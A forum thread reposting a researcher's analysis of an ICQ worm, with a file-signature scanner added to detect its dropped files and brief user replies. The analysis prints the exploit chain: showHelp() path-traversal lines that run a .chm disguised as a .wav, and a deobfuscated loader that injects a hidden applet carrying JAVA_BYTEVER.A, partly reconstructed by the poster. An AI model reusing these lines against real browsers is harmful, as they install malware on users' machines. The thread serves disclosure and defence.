ICQ Worm!


Status
Not open for further replies.
#1
Extracted from: http://www.daemonology.net/ICQworm/worm.txt

WARNING: DO NOT CLICK ON THE LINKS WITHOUT FINISHING READING THROUGH THIS ARTICLE!!!

Summary: A worm is spreading via ICQ, using a flaw in MSIE and a
misconfiguration in ICQ itself. As a side effect (or, quite likely,
the intended purpose), it installs JAVA_BYTEVER.A (or some variant thereof).

The following page contains malware: http://www.jokeworld.biz/index.html
It does the following:
1. Opens up http://www.joecartoon.com/pages/cartoons/ to give the user
something to watch.

2. Opens up http://www.jokeworld.biz/meine.scm, using the ICQ flaw
described at
http://archives.neohapsis.com/archives/bugtraq/2002-07/0182.html
to execute it.

2.1. If ICQ is currently running, the following files will be created:
c:\program files\ICQ\sounds\meine\ChatAction.wav (1088kb of zero bytes)
c:\program files\ICQ\sounds\meine\ChatEmote.wav (empty)
c:\program files\ICQ\sounds\meine\FileDone.wav (513kb of zero bytes)
c:\program files\ICQ\sounds\meine\WebSearch.wav (empty)
c:\program files\ICQ\sounds\meine\Startup.wav (compiled html file, exploit
code)

3. Uses the exploit described at
http://www.securitytracker.com/alerts/2003/Dec/1008578.html
to execute the exploit code using the compiled help viewer:
showHelp("mk:@MSITStore:iexplore.chm::..\\..\\..\\..\\program files\\ICQ\\Sounds\\meine[1]\\Startup.wav::/ie****er.html");
showHelp("mk:@MSITStore:iexplore.chm::..\\..\\..\\..\\program files\\ICQ\\Sounds\\meine\\Startup.wav::/ie****er.html");

3.1. Microsoft's chm format is insufficiently documented for me to get any
further than this without an airgapped system, but I assume it modifies
ICQ's startup procedure to cause the observed symptom of sending
"http://www.jokeworld.biz/index.html :)) LOL" to all contacts at startup.

4. Opens up http://www.sx2group.com/user_bx.html, which after deobfuscating
runs the following code:
<HTML><HEAD></HEAD><BODY>
<!-- The document.write("...") wrapper below is inferred from the quoted
     "+navigator.userAgent+" string concatenation; the page only showed the
     bare tags with trailing semicolons. -->
<script>
document.write("<applet width=1 height=1 ARCHIVE=nocheat.jar code=Counter>");
document.write("<param name='ac' value='BX'>");
document.write("<param name='ua' value='"+navigator.userAgent+"'>");
document.write("<param name='pl' value='"+navigator.platform+"'>");
document.write("</applet>");
</script>
</BODY></HTML>

4.1. nocheat.jar is detected by PC-cillin as JAVA_BYTEVER.A.

Thanks to: Wampus, for getting infected and thereby informing me of this. :)

Colin Percival
cperciva@daemonology.net
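The write-up above lists the files the worm drops into ICQ's sounds folder: two empty .wav files, two large .wav files that are nothing but zero bytes, and a Startup.wav that is really a compiled HTML (.chm) file. A cheap way to confirm an infection, or to watch for the same trick in the future, is to check that every .wav in the sounds tree actually starts with the RIFF signature a genuine WAVE file carries, and to flag the ones that are empty, zero-filled, or carry the "ITSF" signature that Microsoft compiled HTML files begin with. The script below is an added example and not part of Colin Percival's analysis or of ICQ; the sample directory it builds is constructed for the demonstration, with synthetic contents that only mimic the file names and shapes described above.

```python
import os
import tempfile

# Well-known format signatures (assumed here; not taken from the write-up).
RIFF_MAGIC = b"RIFF"   # genuine .wav files are RIFF containers
ITSF_MAGIC = b"ITSF"   # Microsoft compiled HTML (.chm) files start with "ITSF"


def classify_wav(path):
    """Return a short verdict for a file that claims to be a .wav.

    'ok'        -> RIFF header present, looks like real audio
    'empty'     -> zero-length file (as meine\\ChatEmote.wav)
    'zero-fill' -> non-empty but every byte is 0x00 (as meine\\ChatAction.wav)
    'chm'       -> compiled HTML disguised as audio (as meine\\Startup.wav)
    'unknown'   -> some other content that is not RIFF audio
    """
    if os.path.getsize(path) == 0:
        return "empty"
    with open(path, "rb") as fh:
        head = fh.read(4)
        if head == RIFF_MAGIC:
            return "ok"
        if head == ITSF_MAGIC:
            return "chm"
        # Not a known signature: decide between zero padding and other data.
        # Reading in chunks keeps memory flat for the ~1 MB files described.
        fh.seek(0)
        while True:
            chunk = fh.read(65536)
            if not chunk:
                return "zero-fill"
            if chunk.strip(b"\x00"):
                return "unknown"


def scan_sound_dir(root):
    """Walk a sounds directory and return {relative_path: verdict} for
    every .wav that is NOT genuine RIFF audio."""
    findings = {}
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            if not name.lower().endswith(".wav"):
                continue
            full = os.path.join(dirpath, name)
            verdict = classify_wav(full)
            if verdict != "ok":
                findings[os.path.relpath(full, root)] = verdict
    return findings


def build_sample_tree():
    """Constructed sample tree mirroring the file names in the write-up.
    Contents are synthetic stand-ins, not the worm's actual files."""
    root = tempfile.mkdtemp(prefix="icq_sounds_")
    meine = os.path.join(root, "meine")
    os.makedirs(meine)
    # A legitimate-looking sound: RIFF/WAVE header followed by a fmt chunk tag.
    with open(os.path.join(root, "Message.wav"), "wb") as fh:
        fh.write(b"RIFF" + (36).to_bytes(4, "little") + b"WAVEfmt ")
    with open(os.path.join(meine, "ChatAction.wav"), "wb") as fh:
        fh.write(b"\x00" * 4096)                      # zero-filled padding
    open(os.path.join(meine, "ChatEmote.wav"), "wb").close()  # empty file
    with open(os.path.join(meine, "Startup.wav"), "wb") as fh:
        fh.write(b"ITSF" + b"\x03\x00\x00\x00" + b"\x00" * 56)  # CHM-style header
    return root


if __name__ == "__main__":
    sample_root = build_sample_tree()
    for rel, verdict in sorted(scan_sound_dir(sample_root).items()):
        print(f"{verdict:10s} {rel}")
```

On a real machine you would point scan_sound_dir at the ICQ sounds folder instead of the constructed tree; anything reported as "chm" is the file to submit to your antivirus vendor, and "zero-fill" or "empty" entries in an unexpected subfolder are the padding this worm leaves behind.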
 

justarius

Senior Member
Nov 9, 2003
#2
Oh, so it IS a worm! I was quite surprised when I received the exact same message from two different contacts in my ICQ at the same time. I clicked on the link, but closed it before it loaded cos I thought it a bit weird. Hmm.. guess I should have to run a virus scan... ;(
 

phrozact

New Member
Jul 14, 2003
#6
What if I'm using a non-ICQ program like Trillian or Miranda? Will I still be infected and send out those LOL msgs?
I think I clicked on the link, but when my firewall prog warned me abt something related to ICQ, I denied access...I hope.
 
